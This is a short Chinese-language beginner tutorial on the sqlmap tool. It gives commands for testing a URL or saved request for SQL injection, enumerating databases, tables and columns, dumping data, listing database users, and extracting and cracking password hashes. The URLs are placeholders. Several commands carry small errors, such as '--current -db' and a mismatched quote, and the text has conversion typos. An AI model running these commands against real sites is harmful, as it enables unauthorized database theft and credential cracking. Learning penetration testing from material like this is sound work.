1、SQLMAP入门

1、SQLMAP入门

1、判断是否存在注入

sqlmap.py -u 网址/id=1

id=1不可缺乏。当注入点后面的参数大于两个时。须要加双引号，

sqlmap.py -u "网址/id=1&uid=1"

2、判断文本中的请求是否存在注入

从文本中加载http请求，SQLMAP能够从一个文本文件中获取http请求，这样能够不设置其它参数，txt文件中的内容为web数据包。判断是否存在注入的命令：

sqlmap.py -r desktop/1.txt

3、查询当前用户下的全部数据库

该命令是肯定网站存在注入后，用于查询当前用户下的全部数据库。若是当前用户有权限读取包含全部数据库列表信息的表，使用该命令就能够列出全部数据库。

sqlmap.py -u 网址 --dbs、

当继续注入时，--dbs缩写成-D xxx，其意思是在xxx数据库中继续查询其余数据。

4、获取数据库的表名

该命令的做用是查询完数据库后，查询指定数据库中全部的表名。若是在该命令中不加入-D参数来指定某一个具体的数据库，那么SQLMap会列出数据库中全部库的表。

sqlmap.py -u "网址“ -D 数据库名 --tables

当继续注入时，--tables缩写成-T，意思时=是在某表中继续查询。

5、获取表中的字段名

该命令的做用是查询完表名后，查询该表中全部的字段名。

sqlmap.py -u 网址 -D 数据库名 -T 表名 --columns

在后续注入中，--colums缩写成 -C 。

6、获取字段内容

该命令是查询完字段名以后，获取该字段中具体的数据信息。

sqlmap.py -u 网址 -D 数据库名 -T表名 -C字段名 --dump

7、获取数据库的全部用户

该命令的做用是列出数据库的全部用户。若是当前用户有权限读取包含全部用户的表的权限是，使用该命令就能够列出全部管理用户。

sqlmap.py -u 网址 --users

8、获取数据库用户的密码

该命令的做用是列出数据库用户的密码。若是当前用户有读取包含用户密码的权限，SQLMAP会先例举出用户，而后列出Hash，并尝试破解。

sqlmap.py -u 网址 --passwords

9、获取当前网站数据的名称

使用该命令能够列出当前网站使用的数据库

sqlmap.py -u 网址 --current -db

10、获取当前网站数据库的用户名称

使用该命令能够列出当前网站使用的数据库用户。

sqlmap.py -u 网址 --current -user